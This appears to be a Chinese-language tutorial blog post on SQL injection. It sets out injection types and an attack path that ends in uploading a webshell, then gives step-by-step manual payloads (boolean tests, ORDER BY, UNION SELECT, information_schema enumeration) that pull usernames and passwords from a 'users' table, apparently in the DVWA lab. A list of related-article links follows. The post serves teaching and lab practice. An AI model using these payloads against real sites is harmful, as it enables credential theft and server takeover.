SQL Injection(SQL注入)
SQL Injection
SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一
SQL 注入分类 按SQLMap中的分类来看,SQL注入类型有以下 5 种:
UNION query SQL injection(可联合查询注入)
Stacked queries SQL injection(可多语句查询注入)
Boolean-based blind SQL injection(布尔型注入)
Error-based SQL injection(报错型注入)
Time-based blind SQL injection(基于时间延迟注入)
SQL 注入常规利用思路:
1、寻找注入点,可以通过 web 扫描工具实现
2、通过注入点,尝试获得关于连接数据库用户名、数据库名称、连接数据库用户权限、操作系统信息、数据库版本等相关信息。
3、猜解关键数据库表及其重要字段与内容(常见如存放管理员账户的表名、字段名等信息)
4、可以通过获得的用户信息,寻找后台登录。
5、利用后台或了解的进一步信息,上传 webshell 或向数据库写入一句话木马,以进一步提权,直到拿到服务器权限。
手工注入常规思路:
注意:‘#’在SQL语句中表示注释,注释该符号之后的内容
1.判断是否存在注入,注入是字符型还是数字型
通过输入嵌套,判断是字符型还是数字型,单引号还是双引号!
1 or 1 = 1
1' or '1' = 1
1" or "1" = "1
2.猜解 SQL 查询语句中的字段数 (使用order by 判断该表单的字段数)
1’ order by 1 #
1’ order by 2 #
1’ order by 3 #
…………
直到得到返回提示
Unknown column '3' in 'order clause'3.确定显示的字段顺序 使用union链接获取到数据库中那些字段在前端显示
1‘ union select 1,2 ,3,4,#
查看1,2,3,4哪一个位置会返回到前端页面,
4.获取当前数据库(数据库版本version()、当前用户user()、当前所在数据库database())
1’ union select 1,version(),user(),database() #
5.获取数据库中的表 (获取当前数据库的表)
TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息
| Table_schema | 数据表所属的数据库名 |
| Table_name | 表名称 |
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #6.获取表中的字段名
COLUMNS表:提供了关于表中的列的信息。详细表述了某个列属于哪个表
1' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" #7.查询到账户的数据
1' or 1 = 1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #SQL Injection(SQL注入)相关推荐
- Sql Injection脚本注入终极利用方法
本文仅用于教学目的,如果因为本文造成的***后果本人概不负责.因为 发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做任何具有破坏性的操作. 考虑再 ...
- SQL Injection(SQL注入)介绍及SQL Injection攻击检测工具
1.关于SQL Injection 迄今为止,我基本没有看到谁写出一篇很完整的文章,或者说很成熟的解决方案(能做到 的人肯定很多,问题是没有流传开来,很遗憾) 我简单的说几点,希望启发大家思考,起到抛 ...
- nodejs mysql 注入_node.js sql 注入攻击防御方法 (sql Injection)
sql 注入的原理和方法应该都知道了,这里记录一下node-mysql提供的现成的api https://github.com/felixge/node-mysql node-mysql 提供了接口 ...
- linux json 写sql注入,sql注入之AJAX(SQL Injection (AJAX/JSON/jQuery))
sql注入之AJAX(SQL Injection (AJAX/JSON/jQuery)) 0x1 网上搜下没有关于ajax的sql注入文章,这里简单写一下抛砖引玉. 原理自己百度,这里简单说下: 通过 ...
- DVWA-SQL注入(SQL Injection)低/中/高级别
DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤 SQL Injecti ...
- 从入门到入土:[SEED-Lab]-SQL注入攻击|SQL Injection Attack Lab|详细说明|实验步骤|实验截图
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出.欢迎各位前来交流.(部分材料来源网络,若有侵权,立即删除) 本人博客所有文章纯属学习之用,不涉及商业利益.不合适引用,自当删除! 若 ...
- PHP代码审计DVWASQL注入[SQL Injection]
SQL注入[SQL Injection] 靶场搭建可以用蓝易云服务器
- DVWA通关--SQL注入(SQL Injection)
目录 LOW 通关步骤 一.手工注入 二.sqlmap注入 代码分析 MEDIUM 通关步骤 方法一.手工注入 方法二.sqlmap注入 代码分析 HIGH 通关步骤 方法一.手工注入 方法二.sql ...
- SQL 注入(SQL Injection)学习心得
提示:文章写完后,目录可以自动生成 目录 文章目录 前言 一.SQL 注入是什么? 二.SQL 注入攻击手法 1.联合查询注入 2.基于错误信息的注入 3.基于布尔的盲注 4.基于时间的盲注 三.注入 ...
最新文章
- 使用FiddlerCore来截取替换Http请求中的网页内容
- 【数据结构与算法】2.深度优先搜索DFS、广度优先搜索BFS
- 编程之美系列之二——寻找出现频率超过一半的数
- 28名公交驾乘人员昨食物中毒
- python的函数_Python 返回函数+匿名函数
- 安卓简单天气预报app源码_七个个小众但实用的APP,效率翻倍~
- C. Tourist Problem
- SPOJ 2939 Query on a tree V
- python post 上传文件_Python脚本POST上传数据以及文件
- Java旅游网站源码+页面
- Windows10安装韩语输入法详细教程(图文)
- 报表热切换是什么意思?如何做到?
- 2021年9月国产数据库排行榜:达梦奋起直追紧逼OceanBase,openGauss反超PolarDB再升一位...
- 写给女儿高中编程课老师的一封信
- 如何实现微信小程序手机号授权
- 微软 WP 手机刷机工具已恢复正常
- vb程序设计教程第4版龚沛曾 实验答案解析
- python的应用领域有哪些、选择题_Python测试题(题)
- 2021Java最新真实面试题汇总(持续更新)
- Android 4.0模拟器弹出---“谷歌拼音输入法”已停止运行的解决方法